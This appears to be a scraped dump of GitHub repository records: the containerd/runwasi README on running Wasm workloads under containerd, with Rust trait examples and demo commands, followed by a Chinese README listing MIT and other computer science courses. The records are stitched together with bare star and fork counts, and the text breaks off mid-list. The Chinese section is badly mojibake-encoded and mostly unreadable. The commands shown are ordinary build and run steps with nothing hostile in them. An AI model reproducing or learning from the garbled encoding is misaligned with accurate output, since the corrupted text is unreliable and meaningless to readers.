{cs.CV} } ```
Neighborhood Attention Transformer, arxiv 2022 / CVPR 2023. Dilated Neighborhood Attention Transformer, arxiv 2022
neighborhood-attention,pytorch
0
9
27
107
1
2
0
containerd/runwasi
![runwasi logo light mode](./art/logo/runwasi_icon1.svg#gh-light-mode-only) ![runwasi logo dark mode](./art/logo/runwasi_icon3.svg#gh-dark-mode-only) # runwasi > Warning: Alpha quality software, do not use in production. This is a project to facilitate running wasm workloads managed by containerd either directly (ie. through ctr) or as directed by Kubelet via the CRI plugin. It is intended to be a (rust) library that you can take and integrate with your wasm host. Included in the repository is a PoC for running a plain wasi host (ie. no extra host functions except to support wasi system calls). ## Community - If you haven't joined the CNCF slack yet, you can do so [here](https://slack.cncf.io/). - Come join us on our [slack channel #runwasi](https://cloud-native.slack.com/archives/C04LTPB6Z0V) on the CNCF slack. - Public Community Call on Tuesdays every other week at 9:00 AM PT: [Zoom](https://zoom.us/my/containerd?pwd=bENmREpnSGRNRXdBZWV5UG8wbU1oUT09), [Meeting Notes](https://docs.google.com/document/d/1aOJ-O7fgMyRowHD0kOoA2Z_4d19NyAvvdqOkZO3Su_M/edit?usp=sharing) ## Usage runwasi is intended to be consumed as a library to be linked to from your own wasm host implementation. There are two modes of operation supported: 1. "Normal" mode where there is 1 shim process per container or k8s pod. 2. "Shared" mode where there is a single manager service running all shims in process. In either case you need to implement a trait to teach runwasi how to use your wasm host. There are two ways to do this: * implementing the `sandbox::Instance` trait * or implementing the `container::Engine` trait The most flexible but complex is the `sandbox::Instance` trait: ```rust pub trait Instance { /// The WASI engine type type Engine: Send + Sync + Clone; /// Create a new instance fn new(id: String, cfg: Option<&InstanceConfig<Self::E>>) -> Self; /// Start the instance /// The returned value should be a unique ID (such as a PID) for the instance. /// Nothing internally should be using this ID, but it is returned to containerd where a user may want to use it. fn start(&self) -> Result<u32, Error>; /// Send a signal to the instance fn kill(&self, signal: u32) -> Result<(), Error>; /// Delete any reference to the instance /// This is called after the instance has exited. fn delete(&self) -> Result<(), Error>; /// Wait for the instance to exit /// The waiter is used to send the exit code and time back to the caller /// Ideally this would just be a blocking call with a normal result, however /// because of how this is called from a thread it causes issues with lifetimes of the trait implementer. fn wait(&self, waiter: &Wait) -> Result<(), Error>; } ``` The `container::Engine` trait provides a simplified API: ```rust pub trait Engine: Clone + Send + Sync + 'static { /// The name to use for this engine fn name() -> &'static str; /// Run a WebAssembly container fn run_wasi(&self, ctx: &impl RuntimeContext, stdio: Stdio) -> Result<i32>; /// Check that the runtime can run the container. /// This checks runs after the container creation and before the container starts. /// By it checks that the wasi_entrypoint is either: /// * a file with the `wasm` filetype header /// * a parsable `wat` file. fn can_handle(&self, ctx: &impl RuntimeContext) -> Result<()> { /* default implementation*/ } } ``` After implementing `container::Engine` you can use `container::Instance<impl container::Engine>`, which implements the `sandbox::Instance` trait. To use your implementation in "normal" mode, you'll need to create a binary which has a main that looks something like this: ```rust use containerd_shim as shim; use containerd_shim_wasm::sandbox::{ShimCli, Instance} struct MyInstance { // ... } impl Instance for MyInstance { // ... } fn main() { shim::run::<ShimCli<MyInstance>>("io.containerd.myshim.v1", opts); } ``` or when using the `container::Engine` trait, like this: ```rust use containerd_shim as shim; use containerd_shim_wasm::{sandbox::ShimCli, container::{Instance, Engine}} struct MyEngine { // ... } impl Engine for MyEngine { // ... } fn main() { shim::run::<ShimCli<Instance<Engine>>>("io.containerd.myshim.v1", opts); } ``` Note you can implement your own ShimCli if you like and customize your wasm engine and other things. I encourage you to checkout how that is implemented. The shim binary just needs to be installed into `$PATH` (as seen by the containerd process) with a binary name like `containerd-shim-myshim-v1`. For the shared mode: ```rust use containerd_shim_wasm::sandbox::{Local, ManagerService, Instance}; use containerd_shim_wasm::services::sandbox_ttrpc::{create_manager, Manager}; use std::sync::Arc; use ttrpc::{self, Server}; /// ... struct MyInstance { /// ... } impl Instance for MyInstance { // ... } fn main() { let s: ManagerService<Local<MyInstance>> = ManagerService::new(Engine::new(Config::new().interruptable(true)).unwrap()); let s = Arc::new(Box::new(s) as Box<dyn Manager + Send + Sync>); let service = create_manager(s); let mut server = Server::new() .bind("unix:///run/io.containerd.myshim.v1/manager.sock") .unwrap() .register_service(service); server.start().unwrap(); let (_tx, rx) = std::sync::mpsc::channel::<()>(); rx.recv().unwrap(); } ``` This will be the host daemon that you startup and manage on your own. You can use the provided `containerd-shim-myshim-v1` binary as the shim to specify in containerd. Shared mode requires precise control over real threads and as such should not be used with an async runtime. Check out these projects that build on top of runwasi: - [spinkube/containerd-shim-spin](https://github.com/spinkube/containerd-shim-spin) - [deislabs/containerd-wasm-shims](https://github.com/deislabs/containerd-wasm-shims) ### Components - **containerd-shim-[ wasmedge | wasmtime | wasmer ]-v1** This is a containerd shim which runs wasm workloads in [WasmEdge](https://github.com/WasmEdge/WasmEdge) or [Wasmtime](https://github.com/bytecodealliance/wasmtime) or [Wasmer](https://github.com/wasmerio/wasmer). You can use it with containerd's `ctr` by specifying `--runtime=io.containerd.[ wasmedge | wasmtime | wasmer ].v1` when creating the container. And make sure the shim binary must be in $PATH (that is the $PATH that containerd sees). Usually you just run `make install` after `make build`. > build shim with wasmedge we need install library first This shim runs one per pod. - **containerd-shim-[ wasmedge | wasmtime | wasmer ]d-v1** A cli used to connect containerd to the `containerd-[ wasmedge | wasmtime | wasmer ]d` sandbox daemon. When containerd requests for a container to be created, it fires up this shim binary which will connect to the `containerd-[ wasmedge | wasmtime | wasmer ]d` service running on the host. The service will return a path to a unix socket which this shim binary will write back to containerd which containerd will use to connect to for shim requests. This binary does not serve requests, it is only responsible for sending requests to the `containerd-[ wasmedge | wasmtime | wasmer ]d` daemon to create or destroy sandboxes. - **containerd-[ wasmedge | wasmtime | wasmer ]d** This is a sandbox manager that enables running 1 wasm host for the entire node instead of one per pod (or container). When a container is created, a request is sent to this service to create a sandbox. The "sandbox" is a containerd task service that runs in a new thread on its own unix socket, which we return back to containerd to connect to. The Wasmedge / Wasmtime / Wasmer engine is shared between all sandboxes in the service. To use this shim, specify `io.containerd.[ wasmedge | wasmtime | wasmer ]d.v1` as the runtime to use. You will need to make sure the `containerd-[ wasmedge | wasmtime | wasmer ]d` daemon has already been started. ## Contributing To begin contributing, learn to build and test the project or to add a new shim please read our [CONTRIBUTING.md](./CONTRIBUTING.md) ## Demo ### Installing the shims for use with Containerd Make sure you have [installed dependencies](./CONTRIBUTING.md#setting-up-your-local-environment) and install the shims: ```terminal make build sudo make install ``` > Note: `make build` will only build one binary. The `make install` command copies the binary to $PATH and uses symlinks to create all the component described above. Build the test image and load it into containerd: ``` make test-image make load ``` ### Demo 1 using container image that contains a Wasm module. Run it with `sudo ctr run --rm --runtime=io.containerd.[ wasmedge | wasmtime | wasmer ].v1 ghcr.io/containerd/runwasi/wasi-demo-app:latest testwasm /wasi-demo-app.wasm echo 'hello'`. You should see some output repeated like: ```terminal sudo ctr run --rm --runtime=io.containerd.wasmtime.v1 ghcr.io/containerd/runwasi/wasi-demo-app:latest testwasm This is a song that never ends. Yes, it goes on and on my friends. Some people started singing it not knowing what it was, So they'll continue singing it forever just because... This is a song that never ends. Yes, it goes on and on my friends. Some people started singing it not knowing what it was, So they'll continue singing it forever just because... (...) ``` To kill the process, you can run in other session: `sudo ctr task kill -s SIGKILL testwasm`. The test binary supports commands for different type of functionality, check [crates/wasi-demo-app/src/main.rs](crates/wasi-demo-app/src/main.rs) to try it out. ### Demo 2 using OCI Images with custom WASM layers The previous demos run with an OCI Container image containing the wasm module in the file system. Another option is to provide a cross-platform OCI Image that that will not have the wasm module or components in the file system of the container that wraps the wasmtime/wasmedge process. This OCI Image with custom WASM layers can be run across any platform and provides for de-duplication in the Containerd content store among other benefits. To build OCI images using your own images you can use the [oci-tar-builder](./crates/oci-tar-builder/README.md) To learn more about this approach checkout the [design document](https://docs.google.com/document/d/11shgC3l6gplBjWF1VJCWvN_9do51otscAm0hBDGSSAc/edit). > **Note**: This requires containerd 1.7.7+ and 1.6.25+. If you do not have these patches for both `containerd` and `ctr` you will end up with an error message such as `mismatched image rootfs and manifest layers` at the import and run steps. Latest versions of k3s and kind have the necessary containerd versions. Build and import the OCI image with WASM layers image: ``` make test-image/oci make load/oci ``` Run the image with `sudo ctr run --rm --runtime=io.containerd.[ wasmedge | wasmtime | wasmer ].v1 ghcr.io/containerd/runwasi/wasi-demo-oci:latest testwasmoci` ``` sudo ctr run --rm --runtime=io.containerd.wasmtime.v1 ghcr.io/containerd/runwasi/wasi-demo-oci:latest testwasmoci wasi-demo-oci.wasm echo 'hello' hello exiting ```
Facilitates running Wasm / WASI workloads managed by containerd
containerd,kubernetes,rust,wasi,wasm,webassembly
25
57
488
1,068
51
7
10
forthespada/Awsome-Courses
<p align="center"> <a href="https://github.com/awesome-cs-community/Awsome-Courses" target="_blank"> <img src="http://oss.interviewguide.cn/img/202203261514544.png" alt="loading"> </a> </p> <p align="center">โ€œ MITๆ˜ฏๆ‰€ๆœ‰็†ๅทฅ็ง‘ๅญฆๅญ็š„ๅœฃๆฎฟ๏ผŒ็ด ไปฅ้กถๅฐ–็š„ๅทฅ็จ‹ๅญฆๅ’Œ่ฎก็ฎ—ๆœบ็ง‘ๅญฆ่€Œ่‘—ๅใ€‚โ€œ<br> ๆœ€ๅˆๆ‰“็ฎ—ๆ€ป็ป“ไธ€ไปฝMIT็š„่ฎก็ฎ—่ฏพ็จ‹ๅˆ—่กจ๏ผŒๆฒกๆƒณๅˆฐๅŽๆฅ่ถŠ็œ‹่ถŠๅคš๏ผŒ<strong>MITใ€CMUใ€PKUใ€THU....่ฎฉไฝ ็œ‹ๅˆฐๅคด็งƒ...</strong></p> ๐Ÿ‘‰ ๆŽจ่๏ผš**ๅฆ‚ๆžœๅฐไผ™ไผด่ฎฟ้—ฎGithubไป“ๅบ“้€Ÿๅบฆ่พƒๆ…ข๏ผŒๅฏไปฅ่ฎฟ้—ฎ[็ ไบ‘](https://gitee.com/ForthEspada/Awsome-Courses)๏ผŒๆˆ‘ๅœจ็ ไบ‘ไธŠไนŸๆ”พไบ†ไธ€ไปฝ๏ผŒๅŒๆญฅๆ›ดๆ–ฐ** <b><details><summary>:orange_book:ย ไป“ๅบ“่ดก็ŒฎๆŒ‡ๅ—</summary></b> - ็‚นๅ‡ปๅณไธŠ่ง’`fork`ๆŒ‰้’ฎ๏ผŒๅฐ†้กน็›ฎ`fork`ๅˆฐ่‡ชๅทฑ็š„Github่ดฆๆˆท้‡Œใ€‚ - ไฝฟ็”จ`git clone`ๅฐ†้กน็›ฎๅ…‹้š†ๅˆฐๆœฌๅœฐใ€‚ ``` git clone https://github.com/forthespada/Awsome-Courses.git ``` - ็”จ็ผ–่พ‘ๅ™จๆ‰“ๅผ€่ฟ›่กŒ่ดก็Œฎ๏ผŒ็„ถๅŽๆไบคๅˆฐ`fork`็š„ไป“ๅบ“ใ€‚ ``` code . git add . git commit -m "What did you do?" git push origin master ``` - ๆไบค`Pull request` </details> ## ็ผ–็จ‹่ต„ๆบๅˆ†ไบซ ๅญฆไน ่ฎก็ฎ—ๆœบ่ฟ™ไนˆๅคšๅนดไปฅๆฅ๏ผŒๆ…ขๆ…ข็š„ไนŸๆ”ถ้›†ๅˆฐไธ€ไบ›ไธ้”™็š„ๅญฆไน ่ต„ๆบ๏ผŒ็Žฐๅœจๅ…่ดนๅˆ†ไบซไธ€ไธ‹ใ€‚ ### 1ใ€ๆˆ‘่‡ชๅทฑ็š„ๅญฆไน ็ฌ”่ฎฐ็ฝ‘็ซ™ <div> ไปŽๆ กๅ›ญ->่Œๅœบๅคšๅนด็š„่ฎก็ฎ—ๆœบ่‡ชๅญฆๆ€ป็ป“๏ผŒๅŒ…ๆ‹ฌไฝ†ไธ้™่ฎก็ฎ—ๆœบๅŸบ็ก€็Ÿฅ่ฏ†ใ€็ฎ—ๆณ•ใ€ๅ‰็ซฏๅŽ็ซฏใ€ๆ กๆ‹›&็คพๆ‹›ใ€ไบ’่”็ฝ‘ไธ€็บฟๅคงๅŽ‚ไธญ็š„ๅทฅไฝœไฝ“้ชŒ็ญ‰่ฎฐๅฝ•๏ผŒๅšๆŒๅญฆไน ๏ผŒๆŒ็ปญๆˆ้•ฟ๏ผ <a href="https://interviewguide.cn/#/" target="_blank">ไผ ้€้—จ</a> </div> <div align="center"> <a href="https://interviewguide.cn/notes/01-guide/web-guide-reading.html"> <img src="http://oss.interviewguide.cn/img/202205161146636.png" target="_blank"> </a> </div> ### 2ใ€ๅ„็ฑป็ฒพๅ“็ผ–็จ‹่ต„ๆบๅˆ†ไบซ <a href="https://interviewguide.cn/notes/07-resources/01-free/01-introduce.html" target="_blank">ไผ ้€้—จ</a> - ้€Ÿๆฅ๏ผๆต™ๆฑŸๅคงๅญฆCSๆœฌ็ง‘็”Ÿ่ฏพ็จ‹ๅผ€ๆบไบ† - ๅคงๆ ผๅฑ€๏ผๆธ…ๅŽๅคงๅญฆ่ฎก็ฎ—ๆœบ็ณป่ฏพ็จ‹ๆ”ป็•ฅๅ…ฑไบซ่ฎกๅˆ’๏ผ - 1000+่ฎก็ฎ—ๆœบ็ปๅ…ธPDF็”ตๅญไนฆ - Java/C++/Golang็ญ‰็‰ˆๆœฌ็š„LeetCode็ฎ—ๆณ•้ข˜่งฃ - ไพฏๆท่€ๅธˆC++&้™ˆ็ก•่€ๅธˆLinux็ฝ‘็ปœ็ผ–็จ‹ๅ…จๅฅ—่ง†้ข‘ - ้˜ฟ้‡Œใ€็™พๅบฆใ€ๅญ—่Š‚ใ€่…พ่ฎฏ็ญ‰ไบ’่”็ฝ‘ไธ€ไบŒ็บฟไธญๅŽ‚ๆ กๆ‹›้ข่ฏ•PDFๅˆ้›† - ่ฎก็ฎ—ๆœบ็ปๅ…ธๅ›พไนฆTOP50 PDF็‰ˆๆœฌๅˆ้›† - Github ไธŠ็š„ๅ„็ง็กฌๆ ธๆŠ€ๆœฏๅญฆไน ่ทฏ็บฟๆ€็ปดๅฏผๅ›พ~ - ๅ›พ่งฃๆ“ไฝœ็ณป็ปŸใ€็ฝ‘็ปœใ€่ฎก็ฎ—ๆœบ็ป„ๆˆPDFไธ‹่ฝฝ๏ผ้‚ฃไบ›่ฎฉไฝ ่ตท้ฃž็š„่ฎก็ฎ—ๆœบๅŸบ็ก€็Ÿฅ่ฏ†~ - ๅŽ็ซฏๅฟ…ๅค‡๏ผSQL่ฏญๆณ•้€Ÿๆˆๆ‰‹ๅ†Œ๏ผ~ - 10ๅฅ—็ฎ€ๅŽ†ๆจกๆฟ๏ผWordๆ ผๅผ๏ผŒ็™ฝๅซ–ๅฏ็”จ~ - ใ€ŠPro Git ไธญๆ–‡็‰ˆใ€‹PDF๏ผŒๅธฆไฝ ๅญฆไผšgit็š„้ชšๆ“ไฝœ~ - .... ## ่‰ฏๅฟƒๆŽจ่ ๅฆ‚ๆžœไฝ **ๆŒ‘่Šฑ็œผ**ไบ†๏ผŒไธ็Ÿฅ้“่ฏฅๅญฆๅ“ชไธช๏ผŸ ่ฟ‡ๆฅไบบๆŽจ่ไฝ ๅŽป็œ‹็œ‹ๆœฌ้กต้ข็š„**Crash Course Computer Science๏ผˆ่ฎก็ฎ—ๆœบ็ง‘ๅญฆ้€Ÿๆˆ่ฏพ๏ผ‰ใ€ๅ“ˆไฝ›ๅคงๅญฆ็š„CS-50ใ€MIT็š„ 6.828 ใ€MIT ็š„6.824ไปฅๅŠๆธ…ๅŽๅคงๅญฆ็š„OS่ฏพ็จ‹**ใ€‚ ่ฟ™5้—จ่ฏพ็จ‹ๅฏนไบŽๅคงๅคšๆ•ฐไบบ้ƒฝ็ปๅฏนๅ—็”จ๏ผ ## ๅ›ฝๅ†…ไผ˜็ง€็ผ–็จ‹่ง†้ข‘ ๅ…ถๅฎžๅ›ฝๅ†…ไนŸๆœ‰ๅพˆๅคšไผ˜็ง€็ผ–็จ‹่ง†้ข‘๏ผŒไปฅๅ‰้˜ฟ็ง€ๅฐฑๆ›พ็ปๆ€ป็ป“่ฟ‡ไธ‰ๆœŸ๏ผŒไปŠๅคฉไธ€่ตทๅˆ†ไบซๅ‡บๆฅๅง๏ผ **็ฌฌไธ€ๆœŸ**๏ผš[็‚นๅ‡ป็›ด่พพ](https://interviewguide.cn/notes/04-experience/01-learn_experience/20210809%20-%20%E7%AC%AC%E4%B8%80%E6%9C%9F-%E6%88%91%E5%AD%A6%E7%BC%96%E7%A8%8B%E5%85%A8%E9%9D%A0B%E7%AB%99%E4%BA%86%EF%BC%8C%E7%9C%9F%E9%A6%99.html) <img src="http://oss.interviewguide.cn/img/202203261421142.png" alt="็ฌฌไธ€ๆœŸ" style="width:400px;" /> **็ฌฌไบŒๆœŸ**๏ผš[็‚นๅ‡ป็›ด่พพ](https://interviewguide.cn/notes/04-experience/01-learn_experience/20210823%20-%20%E7%AC%AC%E4%BA%8C%E6%9C%9F-%E6%88%91%E5%AD%A6%E7%BC%96%E7%A8%8B%E5%85%A8%E9%9D%A0B%E7%AB%99%E4%BA%86%EF%BC%8C%E7%9C%9F%E9%A6%99.html) <img src="http://oss.interviewguide.cn/img/202203261421279.png" alt="็ฌฌไบŒๆœŸ" style="width:400px;" /> **็ฌฌไธ‰ๆœŸ**๏ผš[็‚นๅ‡ป็›ด่พพ](https://interviewguide.cn/notes/04-experience/01-learn_experience/20210907%20-%20%E7%AC%AC%E4%B8%89%E6%9C%9F-%E6%88%91%E5%AD%A6%E7%BC%96%E7%A8%8B%E5%85%A8%E9%9D%A0B%E7%AB%99%E4%BA%86%EF%BC%8C%E7%9C%9F%E9%A6%99-%E5%9B%BD%E5%A4%96%E7%AF%87%EF%BC%88%E7%AC%AC%E4%B8%89%E6%9C%9F%EF%BC%89.html) <img src="http://oss.interviewguide.cn/img/202203261422715.png" alt="็ฌฌไธ‰ๆœŸ" style="width:400px;" /> ## ๅ…ฅ้—จ็ง‘็›ฎ - **Crash Course Computer Science๏ผŒ่ฎก็ฎ—ๆœบ็ง‘ๅญฆ้€Ÿๆˆ่ฏพ** ่ฟ™้—จ่ฏพๆœ‰ๅพˆๅคšๅœฐๆ–น้ƒฝ้€‚ๅˆๅฐ็™ฝ๏ผŒๆฏ”ๅฆ‚่ง†้ข‘ๅ†…ๅฎน็ฒพ็‚ผไฝ†ไธๅ†—ไฝ™๏ผŒ่ฏฅไป‹็ปๅˆฐ็š„้ƒฝไป‹็ปๅˆฐไบ†๏ผŒๅฆ‚ๆžœไฝ ๆ‹…ๅฟƒ่ฟ™้—จ่ฏพ็จ‹่ฟ‡ไบŽ็ฎ€ๅ•๏ผŒ้‚ฃไฝ ๅฐฑๅคง้”™็‰น้”™ไบ†ใ€‚ - ไปŽ็ปง็”ตๅ™จ่ฎฒๅˆฐ็œŸ็ฉบ็ฎก๏ผŒๆœ€ๅŽๅ†ๅˆฐๆ™ถไฝ“็ฎกๅ’Œ้›†ๆˆ็”ต่ทฏ๏ผ› - ไปŽๆœ€ๅŽŸๅง‹็š„็บธ่ข‹ๆ‰“ๅญ”ๅˆฐๆœบๅ™จ่ฏญ่จ€็š„ๅ‡บ็Žฐ๏ผŒๅ†ๅˆฐๆฑ‡็ผ–่ฏญ่จ€ๅ’Œ้ซ˜็บง่ฏญ่จ€๏ผŒๅฆ‚Javaใ€C++็ญ‰๏ผ› - ไปŽไธŽๆˆ–้ž็š„้€ป่พ‘่ฟ็ฎ—ๅˆฐCPU่ฟ็ฎ—ๆ˜ฏๅฆ‚ไฝ•ๅค„็†็š„๏ผ› - ่ฟ˜ๆœ‰ๆœบๅ™จๅญฆไน ใ€ๆทฑๅบฆๅญฆไน ไปฅๅŠไบบๅทฅๆ™บ่ƒฝ็ญ‰ๆœ€ๆ–ฐ้ข†ๅŸŸ็š„ไป‹็ป ๅฆ‚ๆžœ่ฏดๅ”ฏไธ€็พŽไธญไธ่ถณ็š„็‚น๏ผŒ้‚ฃๅฐฑๆ˜ฏๅ…ถไธญ้ƒจๅˆ†็Žฏ่Š‚่ฏญ้€Ÿ่ฟ‡ๅฟซ๏ผŒๅฏนไบŽๅคงๅคšๆ•ฐๅ›ฝไบบๆฅ่ฏด็œ‹่ตทๆฅๆฏ”่พƒๅƒๅŠ›๏ผŒๅปบ่ฎฎ่‹ฑ่ฏญไธๅคชๅฅฝ็š„ๅŒๅญฆ็œ‹็š„ๆ—ถๅ€™่ฐƒๆˆ0.75ๅ€้€ŸๅŽป่ง‚็œ‹ใ€‚ ่ฟ™้—จ่ฏพๅนถไธไผšๆ•™ไฝ ๅฆ‚ไฝ•ไปŽ0ๅผ€ๅง‹ๅญฆไผš็ผ–็จ‹๏ผŒ่€Œๆ˜ฏ้€š่ฟ‡ไธๆ–ญ็š„ๆŠฝ่ฑกไปŽๅบ•ๅฑ‚ๅˆฐไธŠๅฑ‚่ฟ›่กŒ่ฎฒ่งฃ๏ผŒไปŽ้ซ˜ๅฑ‚ๆฌกไธŠ็บต่งˆไธ€็ณปๅˆ—็š„่ฎก็ฎ—ๆœบ่ฏ้ข˜ใ€‚ ![img](http://oss.interviewguide.cn/img/202208030948917.png) ๅœจ่ฟ™ๆœŸ้—ดไนŸไผš็ฉฟๆ’็€ๅพˆๅคšๆœ‰ๆ„ๆ€็š„ๅŽ†ๅฒๆ•…ไบ‹๏ผŒๆฏ”ๅฆ‚ๅœจๅญ˜ๅ‚จๅ™จ็š„ๆ—ถๅ€™ๅฐฑไผšไปฅ็ฎ—็›˜ไธบๆฅ”ๅญๅผ•ๅ…ฅ๏ผŒๅ‘Š่ฏ‰ไฝ ็ฎ—ๆณ•ๅคง็บฆๅ‡บ็Žฐๅœจๅ…ฌๅ…ƒๅ‰2500ๅนดใ€‚ ![img](http://oss.interviewguide.cn/img/202208030948315.png) ้€‚ๅฝ“็ฉฟๆ’ๅŽ†ๅฒๆ•…ไบ‹๏ผŒ็กฎไฟๅฐ็™ฝไธไผšๆžฏ็‡ฅ&ไธญ้€”ๆ”พๅผƒ๏ผŒๅฝ“่ฎฒๅˆฐ่ฎก็ฎ—ๆœบ็ฝ‘็ปœ็š„ๆ—ถๅ€™๏ผŒๅˆ™ๆ˜ฏไปฅๅŠจๅ›พ็š„ๅฝขๅผๅ‘Š่ฏ‰ไฝ ไบคๆขๆœบไธŠๆ˜ฏๅฆ‚ไฝ•ๅทฅไฝœ็š„๏ผ› ![img](http://oss.interviewguide.cn/img/202208030949422.png) ไบคๆขๆœบๆ˜ฏๅฆ‚ไฝ•ๅทฅไฝœ็š„ ๅช่ƒฝ่ฏด็œ‹่ตทๆฅไธๆ˜ฏไธ€่ˆฌ็š„็ˆฝ๏ผŒ่€Œๆ˜ฏ็‰นๅˆซ็š„ๅพˆ็ˆฝใ€‚ ๅœฐๅ€๏ผšhttps://www.bilibili.com/video/BV1EW411u7th?p=28&vd_source=3fc05c3b7f095e12a12ea9850e2e0a35 - **CS-50** ๅ“ˆไฝ›ๅคงๅญฆๅ…ฌๅผ€่ฏพ๏ผš่ฎก็ฎ—ๆœบ็ง‘ๅญฆcs50ๆ˜ฏ็ปๅ…ธ็š„่ฎก็ฎ—ๆœบๅ…ฅ้—จ่ฏพ็จ‹๏ผŒไป–่ฟ˜ๆœ‰ไธ€ไธชๅนฟไธบไบบ็Ÿฅ็š„ๅค–ๅท๏ผš่ฎก็ฎ—ๆœบ้€Ÿๆˆ่ฏพใ€‚ ๅช่ฆๆ˜ฏๆญฃๅธธ้ซ˜ไธญๆฏ•ไธš็š„ๅŒๅญฆๅบ”่ฏฅ้ƒฝ่ƒฝๅฌๆ‡‚๏ผŒๅบ”่ฏฅ็ฎ—ๆ˜ฏ้ขๅ‘้›ถๅŸบ็ก€็š„่ฏพ็จ‹ใ€‚ ่ฟ™้—จ่ฏพไธ€ๅ…ฑ20้›†๏ผŒไธ€ๅคฉ็œ‹ไธ€้›†ไนŸๅฐฑๅช้œ€่ฆ20ๅคฉ๏ผŒ่ฟ™้—จ่ฏพ็š„ๅ†…ๅฎนๅŒ…ๆ‹ฌๅŸบๆœฌ็š„่ฎก็ฎ—ๆœบ็Ÿฅ่ฏ†ไปฅๅŠๅŸบ็ก€็ฎ—ๆณ•๏ผŒๅธธ่ง็š„็ผ–็จ‹่ฏญ่จ€็ญ‰็ญ‰๏ผŒ่ฟ˜ไผšๆŽข่ฎจๆœ€ๆ–ฐ็š„่ฎก็ฎ—ๆœบ็ง‘ๅญฆ้ข†ๅŸŸ็š„ๆˆๆžœ๏ผŒ่ฏพ็จ‹ๅ‘ๆ•ฃๆ€งๆ€็ปดๅผบใ€‚ ๅคš่ฏดไธ€ๅฅ๏ผŒCS50่ฏพ็จ‹็š„่ฎฒ่ฏพๅฝขๅผ่ฎฉไบบ่€ณ็›ฎไธ€ๆ–ฐ๏ผŒ็œŸๆญฃๅšๅˆฐไบ†โ€œๅฟซไนๅญฆไน โ€ใ€‚ใ€‚ ๅœฐๅ€๏ผšhttps://open.163.com/newview/movie/courseintro?newurl=%2Fspecial%2Fopencourse%2Fcs50.html - **6.0001: Introduction to Computer Science and Programming in Python** ่ฏฅ่ฏพ็จ‹้€‚ๅˆๅพˆๅฐ‘ๆˆ–ๆ นๆœฌๆฒกๆœ‰็ผ–็จ‹็ป้ชŒ็š„ๅญฆ็”Ÿใ€‚ๅฎƒๆ—จๅœจ่ฎฉๅญฆ็”Ÿไบ†่งฃ่ฎก็ฎ—ๅœจ่งฃๅ†ณ้—ฎ้ข˜ๆ–น้ขๅฏไปฅๅ‘ๆŒฅ็š„ไฝœ็”จ๏ผŒๅนถๅธฎๅŠฉๆ‰€ๆœ‰ไธ“ไธš็š„ๅญฆ็”Ÿ้ƒฝๆœ‰็†็”ฑ็›ธไฟกไป–ไปฌๆœ‰่ƒฝๅŠ›็ผ–ๅ†™ๅฐ็จ‹ๅบๅนถไฝฟไป–ไปฌ่ƒฝๅคŸๅฎŒๆˆๆœ‰็”จ็š„็›ฎๆ ‡ใ€‚ ๅ€ผๅพ—ๆณจๆ„็š„ๆ˜ฏ่ฏฅ่ฏพ็จ‹ไฝฟ็”จ Python 3.5 ็ผ–็จ‹่ฏญ่จ€ใ€‚ ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-0001-introduction-to-computer-science-and-programming-in-python-fall-2016/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-0001-introduction-to-computer-science-and-programming-in-python-fall-2016/) - **6.821 ่ฎก็ฎ—ๆœบ็จ‹ๅบ็š„ๆž„้€ ๅ’Œ่งฃ้‡Š** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Structure and Interpretation of Computer Programs](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-001-structure-and-interpretation-of-computer-programs-spring-2005)ใ€ [6.821 Programming Languages (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-821-programming-languages-fall-2002) SICP่ฟ™้—จ่ฏพไปฅๅ‰ๅœจๅพˆ้•ฟไธ€ๆฎตๆ—ถ้—ด้ƒฝๆ˜ฏMITๅ…ฅ้—จ็š„็ฌฌไธ€่ฏพ๏ผŒ้…ๅฅ—็š„ๆ•™ๆSICPใ€Š่ฎก็ฎ—ๆœบ็จ‹ๅบ็š„ๆž„้€ ๅ’Œ่งฃ้‡Šใ€‹ไนŸไธ€็›ด่ขซ่ฎคไธบๆ˜ฏ็จ‹ๅบ่ฎพ่ฎก็š„็ปๅ…ธ่‘—ไฝœ๏ผŒๅ…ถไธญ**็ ”็ฉถ็”Ÿ่ฏพ็จ‹MIT 6.821** ็š„ๅ‚่€ƒไนฆไนŸๆ˜ฏ่ฟ™ๆœฌไนฆใ€‚ - **6.042: Mathematics for Computer Science** ๆœฌ่ฏพ็จ‹ๆไพ›้ขๅ‘่ฎก็ฎ—ๆœบ็ง‘ๅญฆๅ’Œๅทฅ็จ‹็š„็ฆปๆ•ฃๆ•ฐๅญฆ็š„ไบคไบ’ๅผไป‹็ปใ€‚ไธป้ข˜่ฆ†็›–่Œƒๅ›ดๅคง่‡ดๅˆ†ไธบไธ‰้ƒจๅˆ†๏ผš - ๆ•ฐๅญฆ็š„ๅŸบๆœฌๆฆ‚ๅฟต๏ผšๅฎšไน‰๏ผŒ่ฏๆ˜Ž๏ผŒ้›†ๅˆ๏ผŒๅ‡ฝๆ•ฐ๏ผŒๅ…ณ็ณปใ€‚ - ็ฆปๆ•ฃ็ป“ๆž„๏ผšๅ›พๅฝข๏ผŒ็Šถๆ€ๆœบ๏ผŒๆจกๅ—ๅŒ–็ฎ—ๆœฏ๏ผŒ่ฎกๆ•ฐใ€‚ - ็ฆปๆ•ฃๆฆ‚็Ž‡็†่ฎบใ€‚ ๅœฐๅ€๏ผš[https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-042j-mathematics-for-computer-science-spring-2015/](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-042j-mathematics-for-computer-science-spring-2015/) ## ๅŸบ็ก€็ง‘็›ฎ ๅŸบ็ก€่ฏพ็จ‹ๅคงๅคšๆ˜ฏไฝๆœฌ็ง‘็”Ÿๅผ€่ฎพ็š„ใ€‚ - **6.004: Computation Structures** 